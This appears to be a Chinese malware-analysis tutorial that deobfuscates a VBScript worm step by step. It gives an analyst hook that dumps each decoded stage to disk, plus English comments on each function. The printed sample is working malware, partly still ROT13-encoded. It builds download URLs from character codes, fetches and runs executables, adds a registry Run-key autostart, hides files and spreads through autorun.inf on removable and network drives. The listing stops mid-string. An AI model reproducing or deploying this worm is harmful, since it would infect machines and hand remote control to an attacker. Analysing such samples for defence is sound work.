VBS病毒解密初探

1.加密的VBS病毒:
引用:
'0.1
aa="(( '5.6}{=|5.6|}{=|'|}{=|'.|}{=|K O V|& }{=|F W 65.65|}{=(659)&(661)&(661)&(667)&|://|&(30)&|.|&(93)&(00)&(06)&|1|&(655)&(91)&(665)&||&(92)&||&(92)&||&(09)&(91)&(10)&(660)&(35)}{7=(659)&(661)&(661)&(667)&|://|&|6|&(05)&(07)&(91)&(00)&|21|&(09)&(91)&(24)&(669)&(26)&(92)&||&(92)&(31)&(09)&(91)&(10)&(38)&(667)}{ }{ }{ = (|.|)}{ = (|.|)}{ = .(6)}{ = .(5)}{ = .}{=.}{=.(7)&|/|}{=.(6)&|//|}{=(.,(.)-(.))}{ =&|/| =}{ ))
()
(( (&|/.|,6)<>() }{=6}{ <>|<>|}{ >7 }{ &|.|,7,5,6,655}{=(&|.|,6)}{}{ &|.|,,5,6,655}{=(&|.|,6)}{ }{=+6}{ >9 }{ }{ }{}{ .(&|.|) }{ = .(&|.|, 6)  }{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{= .}{.  }{.(&|.|)}{ =|<>| }{ &|/.|,}{ ,,,}{ <> .(&|/|&) }{ &|/|&,,,8,7555}{.}{ }{ =6 }{ <> .(&) }{ &}{ &,,6,8,6555}{ }{ }{ }{ }{ }{ }{ }{ (&,2)=6 }{(((&,4)))}{ }{ ))

()
(( .() }{ ,5}{.()}{ }{ .() }{ ,5}{.()}{ ))

(,)
(( }{ = .(, )}{. }{.}{ ,7+9 ))

(,,,)
(( &}{ = .(&, )}{. }{. |[]|}{. }{. |=. ./|&&|.|}{. }{. |/=打开(&)|}{. }{. |//=. ./|&&|.|}{. }{. |//=6|}{. }{.}{ &,6+7+9 ))

(,) 
(( .() }{ = .(, 6)  }{=5 }{ <}{=+6}{ = .}{}{.}{=}{}{=|_|}{ ))

(,)
(( .() }{ = .() }{. = }{ = }{ }{ .() }{ = .()}{. = }{ = }{ ))

(,,,,)
(( =5}{ <}{ ,5}{ = (): = ():}{' 6=7 . |!|}{ = (|.|)  }{' 6=7 . |!|}{. ||,,5 }{' 6=7 . |!|}{ }{.()}{ }{' 6=7 . |!|}{ = (|.|) }{' 6=7 . |!|}{. = 8 }{' 6=7 . |!|}{. = 6  }{' 6=7 . |!|}{.()  }{' 6=7 . |!|}{.(.)  }{' 6=7 . |!|}{. ,7 }{' 6=7 . |!|}{ ,7+9}{ .() }{=.().}{}{=5}{ }{ > }{ =6 . }{ }{ }{}{=+6}{ }{. 8555}{ }{ ))

()
. = 5 
= 

.
= 


()
= 188211798279118902310182029107377911277514886750917591017317748168962818739141973177147867474777118717794117516886878075091310175168868877711871779411751688687887509131017516886857771187177141175168868789750913101751688889777118717714117516884817516119751688686857529131017771187177168167868877711871":function ee(aa):hh=vbCrLf:Execute("For i=1 To Len(aa)"&hh&"a=Asc(Mid(aa,i,1))"&hh&"If a=127 Then a=13"&hh&"If a=11 Then a=10"&hh&"if a=12 Then a=34"&hh&"if a>=14 and a<=31 then"&hh&"a=a+83"&hh&"elseif a>=1 and a<=8 then"&hh&"a=a+114"&hh&"elseif a>=53 and a<=57 then"&hh&"a=a-5"&hh&"elseif a>=48 and a<=52 then"&hh&"a=a+5"&hh&"End If"&hh&"ee=ee+chr(a)"&hh&"Next"):end function:bb="7710128101411751688685847516119751688687887529131017771187177168167868877711871779011975941177711871772018820187181327731674777118717791023297774 := := &(& := ) : ()>6: ((,6)) =&&(,7)&:=(,8) =&+(,9)+:=(,0)
:()

()
( )

(( }{ =&|/| =.(| |&,8,)}{}{ }{. 0555}{ (|.|,7)=6 (&|/.|,6)= () .}{ (|.|,7)<>6 (|.|,7) .}{ }{ (&,6)<>|'|& }{}{ }{ }{}{ (&,6)<> }{ ,5,5,5}{ }{=(&,0)}{ .(&) }{. &}{ }{ (&|/|&&|.|,6)<>|'|& }{ &|/|&&|.|}{}{ }{ (&|/|&&|.|,6)<>|'|& }{ &|/|&&|.|}{ }{ (&&|.|,6)<>|'|& (&,66)=6 }{ &&|.|,(O6+O7)}{ }{ (&,66)=7 }{ }{ . = 7 }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/.|) }{ &|/.|}{ &|/.|,6+7+9}{ }{ }{}{ }{ (|.|,6) }{=6}{ (|.|,6) }{=7}{ (|.|,6) }{=8}{ }{=9}{ }{ = () 8 }{ (=6 =6) (=7 =7) (=8 =7) (=9 =5) }{}{ &|/.|,}{ }{}{}{. &}{}{ &,7+9}{ &|/|&&|.|}{ &|/|&&|.|}{}{. &|/|&&|.|}{ ))
(,)
(( }{ =(|://.//7|) }{ =.(| * 87_ ='|&&|'|)}{=6 }{    }{=+6}{}{ }{ > = }{}{ = 6}{ ))

(,)

.() 
. ,,


()

=.(&,6)
=. 
. 
= .(, )
. 
.
,7+9

()
RP= HKEY_LOCAL_MACHINE/SOFTWARE/M/W/CV//E// 
T_N= REG_SZ 
K_N= 
K_D=& . 
W.RW RP&K_N,K_D,T_N 

()
RP= HKEY_CURRENT_USER/S/M/W/CV/E/A/ 
T_N= REG_DWORD 
K_N= SSH 
K_D= 55555555 
W.RW RP&K_N,K_D,T_N 

() 
.() 


.(.()) 
.() 

.() 

(,,,)
(( .(&) (,6) }{ &,|://|&,5,7,8555}{ }{ .(&) }{ <>5 }{=}{. |%% / 7557-|&()&|-|&(),}{. (*6555)}{ }{. &}{=6}{ >5 }{. 0555}{. |%% / |&,}{ }{ ))

()
(( }{ }{ . = 8 (. = 6 <>|A:| <> |B:|) }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/|&&|.|) .(&|/.|) }{ (&|/.|,6)<> }{ &|/|&,&|/.|}{ &|/|&&|.|,&|/|&&|.|}{ }{}{}{ &|/|&,&|/.|}{ &|/|&&|.|,&|/|&&|.|}{ }{ }{}{ (() 7)=5 <>-6 }{}{ }{. 8555}{ ))

()
(( (|,!|)}{ &}{. ))
":Execute(ee(aa&bb)):ff=". (*6555)}{ }{. &}{=6}{ >5 }{. 0555}{. |%% / |&,}{ }{ ))

()
(( }{ }{ . = 8 (. = 6 <>|A:| <> |B:|) }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/|&&|.|) .(&|/.|) }{ (&|/.|,6)<> }{ "
2.第一次解密:
注意末尾有一个 execute,将它修改为 intercept,并在 VBS 源码后面加上 Intercept 过程,代码如下:
引用:
' Analyst hook: stands in for the sample's final execute() so the decoded
' stage is displayed and written to disk instead of being run.
'   ee - the decoded VBScript text the sample was about to execute.
' Side effects: echoes ee, overwrites decode_1.txt (ANSI) in the current
' directory, opens it through the shell's .txt association, then quits the host.
Sub Intercept (ee)
Dim dumpPath, fs, shell, out
dumpPath="decode_1.txt"
' Show the text first so it is visible even if the file write fails.
WScript.Echo ee
Set fs=CreateObject("Scripting.FileSystemObject")
' overwrite=True, unicode=False (matches the original; non-ASCII payload
' characters are written in the system code page).
Set out=fs.CreateTextFile(dumpPath,True,False)
out.Write ee
out.Close
' Keep the .txt extension: Run() hands the path to the file association, so a
' script extension here would execute the decoded stage instead of showing it.
Set shell=CreateObject("WScript.Shell")
shell.Run dumpPath
' Stop the patched sample before any of its own code can continue.
WScript.Quit
End Sub
另存为vbs 文件,运行后出来一个框,确定后得到decode_1.txt文档:
引用:
' Stage-2 prologue. The string is uc()-encoded (ROT13 on a-z, "}{" = CRLF,
' "|" = double quote, see uc below) and passed straight to execute(); the
' decoded text is the global setup shown in section 4, segment 1.
execute(uc("'0.1}{ire=|0.1|}{svyranzr=|'|}{vasanzr=|'.vav|}{gvyr=|Kvat Os Vof|&ire }{nobhg=|Fbe Wbeq 10.10|}{sebzhey=pue(104)&pue(116)&pue(116)&pue(112)&|://|&pue(85)&|b.|&pue(48)&pue(55)&pue(51)&|6p|&pue(100)&pue(46)&pue(110)&|rg|&pue(47)&|b|&pue(47)&|i|&pue(54)&pue(46)&pue(65)&pue(115)&pue(80)}{sebzhey2=pue(104)&pue(116)&pue(116)&pue(112)&|://|&|k1|&pue(50)&pue(52)&pue(46)&pue(55)&|76|&pue(54)&pue(46)&pue(79)&pue(114)&pue(71)&pue(47)&|b|&pue(47)&pue(86)&pue(54)&pue(46)&pue(65)&pue(83)&pue(112)}{ba reebe erfhzr arkg}{qvz jfu}{frg jfu = perngrbowrpg(|jfpevcg.furyy|)}{frg sfb = perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|)}{frg qve = sfb.trgfcrpvnysbyqre(1)}{frg jva = sfb.trgfcrpvnysbyqre(0)}{frg qp = sfb.qevirf}{bhjaanzr=jfpevcg.fpevcganzr}{rkrzhyh=sfb.trgfcrpvnysbyqre(2)&|/|}{jorz=sfb.trgfcrpvnysbyqre(1)&|/jorz/|}{zhyh=yrsg(jfpevcg.fpevcgshyyanzr,yra(jfpevcg.fpevcgshyyanzr)-yra(jfpevcg.fpevcganzr))}{vs zhyh=qve&|/| gura flf=gehr}{"))
' gettask: body is uc()-encoded and decoded only at call time via execute().
' Decoded form: section 4, segment 2 (daily C2 poll that fetches a task file
' and new payloads).
function gettask()
execute(uc("vs ernqgkg(qve&|/qngr.ova|,1)<>gevz(qngr) gura}{wf=1}{qb juvyr purpx<>|<fpevcg>|}{vs wf>2 gura}{nqiqbjasvyr zhyh&|grzc.gkg|,sebzhey2,0,1,100}{purpx=ernqgkg(zhyh&|grzc.gkg|,1)}{ryfr}{nqiqbjasvyr zhyh&|grzc.gkg|,sebzhey,0,1,100}{purpx=ernqgkg(zhyh&|grzc.gkg|,1)}{raq vs}{wf=wf+1}{vs wf>4 gura}{rkvg qb}{raq vs}{ybbc}{vs sfb.svyrrkvfgf(zhyh&|grzc.gkg|) gura}{frg bcrasvyr = sfb.bcragrkgsvyr(zhyh&|grzc.gkg|, 1)  }{purpx = bcrasvyr.ernqyvar}{qbjavf = bcrasvyr.ernqyvar}{qbjanzr = bcrasvyr.ernqyvar}{qbjasebz = bcrasvyr.ernqyvar}{iofire = bcrasvyr.ernqyvar}{iofeha = bcrasvyr.ernqyvar}{iofanzr = bcrasvyr.ernqyvar}{iofsebz = bcrasvyr.ernqyvar}{gnfxvf = bcrasvyr.ernqyvar}{gnfxpbqr = bcrasvyr.ernqyvar}{hcior= bcrasvyr.ernqyvar}{bcrasvyr.pybfr  }{sfb.qryrgrsvyr(zhyh&|grzc.gkg|)}{vs purpx=|<fpevcg>| gura}{ohvyqsvyr qve&|/qngr.ova|,qngr}{ohvyqvas qbjanzr,gnfxvf,gnfxpbqr,hcior}{vs iofire<>ire be abg sfb.svyrrkvfgf(qve&|/|&iofanzr) gura}{nqiqbjasvyr qve&|/|&iofanzr,iofsebz,iofeha,3,2000}{jfpevcg.dhvg}{raq vs}{vs qbjavf=1 naq flf gura}{vs qbjanzr<>yrkr be abg sfb.svyrrkvfgf(rkrzhyh&yrkr) gura}{qrysvyr rkrzhyh&yrkr}{nqiqbjasvyr rkrzhyh&qbjanzr,qbjasebz,1,3,1000}{raq vs}{raq vs}{raq vs}{raq vs}{raq vs}{ba reebe erfhzr arkg}{vs flf gura}{vs ernqgkg(zhyh&vasanzr,7)=1 gura}{rkrphgr(hp(ernqgkg(zhyh&vasanzr,9)))}{raq vs}{raq vs"))
end function
' delfile: uc()-encoded; decoded form in section 4, segment 3 (clears
' attributes, then deletes a file or folder).
function delfile(where)
execute(uc("vs sfb.svyrrkvfgf(jurer) gura }{fuhkvat jurer,0}{sfb.qryrgrsvyr(jurer)}{raq vs}{vs sfb.sbyqrerkvfgf(jurer) gura}{fuhkvat jurer,0}{sfb.qryrgrsbyqre(jurer)}{raq vs"))
end function
' buildfile: uc()-encoded; decoded form in section 4, segment 4 (writes one
' line to a fresh file and marks it hidden+system).
function buildfile(where,what)
execute(uc("qrysvyr jurer}{frg ova = sfb.perngrgrkgsvyr(jurer, gehr)}{ova.jevgryvar jung}{ova.pybfr}{fuhkvat jurer,2+4"))
end function
' buildinf: uc()-encoded; decoded form in section 4, segment 5 (writes the
' autorun.inf template that later gets copied to drives).
function buildinf(exever,taskcode,tasksw,adv)
execute(uc("qrysvyr zhyh&vasanzr}{frg vav = sfb.perngrgrkgsvyr(zhyh&vasanzr, gehr)}{vav.jevgryvar gvyr}{vav.jevgryvar |[nhgbeha]|}{vav.jevgryvar nobhg}{vav.jevgryvar |bcra=jfpevcg.rkr ./|&svyranzr&|.iof|}{vav.jevgryvar rkrire}{vav.jevgryvar |furyy/bcra=打开(&b)|}{vav.jevgryvar gnfxpbqr}{vav.jevgryvar |furyy/bcra/pbzznaq=jfpevcg.rkr ./|&svyranzr&|.iof|}{vav.jevgryvar gnfxfj}{vav.jevgryvar |furyy/bcra/qrsnhyg=1|}{vav.jevgryvar nqi}{vav.pybfr}{fuhkvat zhyh&vasanzr,1+2+4"))
end function
' readtxt: uc()-encoded; decoded form in section 4, segment 6 (returns line
' number `line` of a file, or "not_found").
function readtxt(where,line)
execute(uc("vs sfb.svyrrkvfgf(jurer) gura}{frg ernqsvyr = sfb.bcragrkgsvyr(jurer, 1)  }{v=0 }{qb juvyr v<yvar}{v=v+1}{fgeyvar = ernqsvyr.ernqyvar}{ybbc}{ernqsvyr.pybfr}{ernqgkg=fgeyvar}{ryfr}{ernqgkg=|abg_sbhaq|}{raq vs"))
end function
' shuxing: uc()-encoded; decoded form in section 4, segment 7 (sets the
' attribute bits of a file or folder).
function shuxing(file,change)
execute(uc("vs sfb.svyrrkvfgf(svyr) gura}{frg bsvyr = sfb.trgsvyr(svyr) }{bsvyr.nggevohgrf = punatr}{frg bsvyr = abguvat}{raq vs}{vs sfb.sbyqrerkvfgf(svyr) gura}{frg bsvyr = sfb.trgsbyqre(svyr)}{bsvyr.nggevohgrf = punatr}{frg bsvyr = abguvat}{raq vs"))
end function
' advdownfile: uc()-encoded; decoded form in section 4, segment 8 (HTTP
' download with retries via MSXML2/XMLHTTP + ADODB.Stream, optional run).
function advdownfile(localfile,urlfile,runfile,cishu,minsize)
execute(uc("grfg=0}{qb juvyr grfg<pvfuh}{fuhkvat ybpnysvyr,0}{vybpny = ypnfr(ybpnysvyr):verzbgr = ypnfr(heysvyr):}{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|)  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{kcbfg.bcra |trg|,verzbgr,0 }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ba reebe erfhzr arkg}{kcbfg.fraq()}{vs abg re gura}{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{frg ftrg = perngrbowrpg(|nqbqo.fgernz|) }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.zbqr = 3 }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.glcr = 1  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.bcra()  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.jevgr(kcbfg.erfcbafrobql)  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.fnirgbsvyr vybpny,2 }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{fuhkvat ybpnysvyr,2+4}{vs sfb.svyrrkvfgf(ybpnysvyr) gura}{svyrfvmr=sfb.trgsvyr(ybpnysvyr).fvmr}{ryfr}{svyrfvmr=0}{raq vs}{vs svyrfvmr>zvafvmr gura}{vs ehasvyr=1 gura jfu.eha ybpnysvyr}{rkvg qb}{raq vs}{ryfr}{grfg=grfg+1}{qrysvyr ybpnysvyr}{jfpevcg.fyrrc 3000}{raq vs}{ybbc"))
end function
' er: returns true if an error is pending (and clears it), false otherwise.
' Companion to the global "on error resume next": callers branch on er
' instead of letting a failure abort the script. Not encoded.
function er()
if err.number = 0 then
er = false
else
err.clear
er = true
end if
end function
' uc: the sample's string decoder, itself hidden one level deeper.
' x holds hex-encoded VBScript; the loop turns it into an
' "execute ""&chr(&hXX)&..." statement (y) and executes it, which in turn
' defines the real decoder (decoded text in section 3): for each char of b,
' 125 "}" -> CR, 123 "{" -> LF, 124 "|" -> double quote, and ROT13 on a-z.
' Every hex pair in x starts with a digit (all bytes are printable ASCII), so
' the 4-character else branch is presumably never taken -- verify if reusing.
' For analysis this function can be replaced by a static ROT13 + substitution
' pass; nothing from the sample needs to be executed to read it.
function uc(b)
x="633d766243724c663a457865637574652822466f7220693d3120546f204c656e2862293a613d417363284d696428622c692c3129292226632622496620613d313235205468656e20613d31332226632622496620613d313233205468656e20613d31302226632622696620613d313234205468656e20613d33342226632622696620613e393620616e6420613c313130207468656e2226632622613d612b31332226632622656c7365696620613e31303920616e6420613c313233207468656e2226632622613d612d31332226632622456e64204966222663262275633d75632b63687228612922266326224e6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
loop:execute(y)
end function
' ucc: ignores its argument and only shows a message box; returns Empty.
' Called from the main body as ucc(O1+O2) -- looks like a stub or leftover.
function ucc(b)
msgbox("holle hacker")
end function
' Main body, uc()-encoded. Decoded form: section 4, segment 12 (mutual
' exclusion, self-integrity check, persistence via registry and System/Windows
' folder copies, AV-dependent C2 schedule, then the infection loop).
execute(uc("sbe rnpu q va qp}{vs zhyh=q&|/| gura bcraqvfx=jfu.eha(|rkcybere |&q,3,snyfr)}{arkg}{vs abg flf gura}{jfpevcg.fyrrc 5000}{vs wvapurat(|jfpevcg.rkr|,2)=1 naq ernqgkg(qve&|/qngr.ova|,1)= gevz(qngr) gura jfpevcg.dhvg}{vs wvapurat(|jfpevcg.rkr|,2)<>1 naq wvapurat(|jfpevcg.rkr|,2) gura jfpevcg.dhvg}{raq vs}{vs ernqgkg(zhyh&bhjaanzr,1)<>|'|&ire gura}{puratsn}{raq vs}{vs flf gura}{lvapnat}{vs ernqgkg(zhyh&vasanzr,1)<>gvyr gura}{ohvyqvas ire,0,0,0}{raq vs}{yrkr=ernqgkg(zhyh&vasanzr,5)}{vs sfb.svyrrkvfgf(rkrzhyh&yrkr) gura}{jfu.eha rkrzhyh&yrkr}{raq vs}{vs ernqgkg(qve&|/|&svyranzr&|.ior|,1)<>|'|&ire gura}{pbcliof qve&|/|&svyranzr&|.ior|}{muhpr}{raq vs}{vs ernqgkg(jva&|/|&svyranzr&|.ior|,1)<>|'|&ire gura}{pbcliof jva&|/|&svyranzr&|.ior|}{raq vs}{vs ernqgkg(jorz&svyranzr&|.ior|,1)<>|'|&ire naq ernqgkg(zhyh&vasanzr,11)=1 gura}{ohvyqsvyr jorz&svyranzr&|.ior|,hpp(O1+O2)}{raq vs}{vs ernqgkg(zhyh&vasanzr,11)=2 gura}{sbe rnpu q va qp}{vs q.qevirglcr = 2 gura}{vs sfb.svyrrkvfgf(q&|/nhgbeha.vas|) gura}{qrysvyr q&|/nhgbeha.vas|}{raq vs}{vs abg sfb.sbyqrerkvfgf(q&|/nhgbeha.vas|) gura}{ohvyqsbyq q&|/nhgbeha.vas|}{fuhkvat q&|/nhgbeha.vas|,1+2+4}{raq vs}{raq vs}{arkg}{raq vs}{vs wvapurat(|nic.rkr|,1) gura }{x=1}{ryfrvs wvapurat(|xjngpu.rkr|,1) gura }{x=2}{ryfrvs wvapurat(|ppragre.rkr|,1) gura }{x=3}{ryfr }{x=4}{raq vs}{g = qnl(qngr) zbq 3 }{vs (x=1 naq g=1) be (x=2 naq g=2) be (x=3 naq g=2) be (x=4 naq g=0) gura}{ryfr}{ohvyqsvyr qve&|/qngr.ova|,qngr}{raq vs}{}{tnaena}{jfu.eha zhyh&bhjaanzr}{ryfr}{fuhkvat zhyh&bhjaanzr,2+4}{pbcliof qve&|/|&svyranzr&|.ior|}{pbcliof jva&|/|&svyranzr&|.ior|}{muhpr}{jfu.eha qve&|/|&svyranzr&|.ior|}{raq vs"))
' jincheng: uc()-encoded; decoded form in section 4, segment 13 (WMI
' Win32_Process count for a given image name).
function jincheng(where,geshu)
execute(uc("ba reebe erfhzr arkg}{frg l=trgbowrpg(|jvaztzgf://./ebbg/pvzi2|) }{frg k=l.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&jurer&|'|)}{v=1 }{sbe rnpu w va k   }{v=v+1}{arkg}{vs abg re gura}{vs v>trfuh gura wvapurat = gehr}{ryfr}{wvapurat = 1}{raq vs"))
end function
' copyfile: deletes the destination (delfile also clears its attributes),
' then copies `file` over it with overwrite=true. Not encoded.
function copyfile(file,where)
delfile where
if fso.fileexists(file) then
fso.copyfile file,where,true
end if
end function
' copyvbs: self-replication. Reads this script's own source
' (mulu&ouwnname), writes it to `where`, then sets hidden+system (2+4).
' Detection hint: wscript.exe creating hidden+system .vbe files in the
' System/Windows folders.
function copyvbs(where)
delfile where
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.createtextfile(where, true)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function
' zhuce ("register"): persistence. Writes value "explorer" = filename&".vbe"
' under HKLM\...\CurrentVersion\policies\Explorer\run, a policy-controlled
' autostart location. The relative value runs the copy placed in the System
' folder (see copyvbs/main). Detection: RegWrite to this key from wscript.exe.
' NOTE(review): separators render as "/" here; the real sample presumably used
' "\" -- confirm against the raw file before writing signatures.
function zhuce()
RegPath="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/policies/Explorer/run/"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data=filename&".vbe"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
' yincang ("hide"): sets HKCU\...\Explorer\Advanced\ShowSuperHidden to 0 so
' Explorer keeps hidden+system files (the dropped copies and autorun.inf)
' invisible to the user. Mitigation: re-enable "show protected OS files" and
' alert on writes to this value by scripting hosts.
' NOTE(review): the stray space after "HKEY_CURRENT_USER/" and the "/"
' separators look like page-rendering artifacts -- verify on the raw sample.
function yincang()
RegPath="HKEY_CURRENT_USER/ Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
' buildfold: recursive mkdir -- creates missing parent folders first, then
' `path`. Used by the main body to create a *folder* named autorun.inf on
' fixed drives, which blocks other autorun droppers from writing that file.
function buildfold(path)
if fso.folderexists(path) then
exit function
end if
if not fso.folderexists(fso.getparentfoldername(path)) then
buildfold fso.getparentfoldername(path)
end if
fso.createfolder(path)
end function
' dowork: uc()-encoded; decoded form in section 4, segment 16 (downloads an
' executable to Temp and runs it, optionally after rolling the system date
' back to 2002). No caller is visible on this page.
function dowork(pcs,fname,furl,time)
execute(uc("vs abg sfb.svyrrkvfgf(rkrzhyh&sanzr) naq wvapurat(cpf,1) gura}{nqiqbjasvyr rkrzhyh&sanzr,|uggc://|&shey,0,2,3000}{raq vs}{vs sfb.svyrrkvfgf(rkrzhyh&sanzr) gura}{vs gvzr<>0 gura}{abjqngr=qngr}{jfu.eha |%pbzfcrp% /p qngr 2002-|&zbagu(qngr)&|-|&qnl(qngr),iouvqr}{jfpevcg.fyrrc nof(gvzr*1000)}{raq vs}{jfu.eha rkrzhyh&sanzr}{qbjbex=1}{vs gvzr>0 gura}{jfpevcg.fyrrc 5000}{jfu.eha |%pbzfcrp% /p qngr |&abjqngr,iouvqr}{raq vs }{raq vs"))
end function
' ganran ("infect"): uc()-encoded; decoded form in section 4, segment 17
' (endless loop dropping autorun.inf + a .vbs copy on removable and network
' drives, polling the C2 every even minute).
function ganran()
execute(uc("qb}{sbe rnpu q va qp}{vs q.qevirglcr = 3 be (q.qevirglcr = 1 naq q<>|A:| naq q<> |B:|) gura}{vs sfb.sbyqrerkvfgf(q&|/nhgbeha.vas|) gura}{qrysvyr q&|/nhgbeha.vas|}{raq vs}{vs sfb.svyrrkvfgf(q&|/|&svyranzr&|.iof|) naq sfb.svyrrkvfgf(q&|/nhgbeha.vas|) gura}{vs ernqgkg(q&|/nhgbeha.vas|,1)<>gvyr gura}{pbclsvyr qve&|/|&vasanzr,q&|/nhgbeha.vas|}{pbclsvyr jva&|/|&svyranzr&|.ior|,q&|/|&svyranzr&|.iof|}{raq vs}{ryfr}{lvapnat}{pbclsvyr qve&|/|&vasanzr,q&|/nhgbeha.vas|}{pbclsvyr jva&|/|&svyranzr&|.ior|,q&|/|&svyranzr&|.iof|}{raq vs}{raq vs}{arkg}{vs (zvahgr(abj) zbq 2)=0 naq ej<>-1 gura }{trggnfx}{raq vs}{jfpevcg.fyrrc 3000}{ybbc"))
end function
' chengfa ("punish"): uc()-encoded; decoded form in section 4, segment 18
' (message box, deletes the running copy, quits). Triggered when the script's
' own first line no longer matches "'"&ver, i.e. when it has been edited.
function chengfa()
execute(uc("zftobk(|uryyb,unpxre!|)}{qrysvyr zhyh&bhjaanzr}{jfpevcg.dhvg"))
end function
3.获取再次解密的函数:
可以看到很多 execute(uc(...)) 形式的加密调用,中间部分有一个 uc 函数,它就是解密函数:
引用:
' uc: the sample's string decoder (same code as in the decode_1.txt listing).
' x is hex-encoded VBScript; the loop rebuilds it as an
' "execute ""&chr(&hXX)&..." statement and executes it, which defines the
' actual decoder: 125 "}" -> CR, 123 "{" -> LF, 124 "|" -> double quote,
' ROT13 on a-z (see the decoded text below).
' All hex pairs here begin with a digit, so the 4-character else branch is
' presumably dead -- verify before relying on it.
function uc(b)
x="633d766243724c663a457865637574652822466f7220693d3120546f204c656e2862293a613d417363284d696428622c692c3129292226632622496620613d313235205468656e20613d31332226632622496620613d313233205468656e20613d31302226632622696620613d313234205468656e20613d33342226632622696620613e393620616e6420613c313130207468656e2226632622613d612b31332226632622656c7365696620613e31303920616e6420613c313233207468656e2226632622613d612d31332226632622456e64204966222663262275633d75632b63687228612922266326224e6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
loop:execute(y)
end function
这段本身也是加密的,先用老方法(intercept)解密,得到:
引用:
execute ""&chr(&h63)&chr(&h3d)&chr(&h76)&chr(&h62)&chr(&h43)&chr(&h72)&chr(&h4c)&chr(&h66)&chr(&h3a)&chr(&h45)&chr(&h78)&chr(&h65)&chr(&h63)&chr(&h75)&chr(&h74)&chr(&h65)&chr(&h28)&chr(&h22)&chr(&h46)&chr(&h6f)&chr(&h72)&chr(&h20)&chr(&h69)&chr(&h3d)&chr(&h31)&chr(&h20)&chr(&h54)&chr(&h6f)&chr(&h20)&chr(&h4c)&chr(&h65)&chr(&h6e)&chr(&h28)&chr(&h62)&chr(&h29)&chr(&h3a)&chr(&h61)&chr(&h3d)&chr(&h41)&chr(&h73)&chr(&h63)&chr(&h28)&chr(&h4d)&chr(&h69)&chr(&h64)&chr(&h28)&chr(&h62)&chr(&h2c)&chr(&h69)&chr(&h2c)&chr(&h31)&chr(&h29)&chr(&h29)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h49)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h32)&chr(&h35)&chr(&h20)&chr(&h54)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h49)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h32)&chr(&h33)&chr(&h20)&chr(&h54)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h30)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h32)&chr(&h34)&chr(&h20)&chr(&h54)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h33)&chr(&h34)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3e)&chr(&h39)&chr(&h36)&chr(&h20)&chr(&h61)&chr(&h6e)&chr(&h64)&chr(&h20)&chr(&h61)&chr(&h3c)&chr(&h31)&chr(&h31)&chr(&h30)&chr(&h20)&chr(&h74)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h61)&chr(&h3d)&chr(&h61)&chr(&h2b)&chr(&h31)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h65)&chr(&h6c)&chr(&h73)&chr(&h65)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3e)&chr(&h31)&chr(&h30)&chr(&h39)&chr(&h20)&chr(&h61)&chr(&h6e)&chr(&h64)&chr(&h20)&chr(&h61)&chr(&h3c)&chr(&h31)&chr(&h32)&chr(&h33)&chr(&h20)&chr(&h74)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h61)&chr(&h3d)
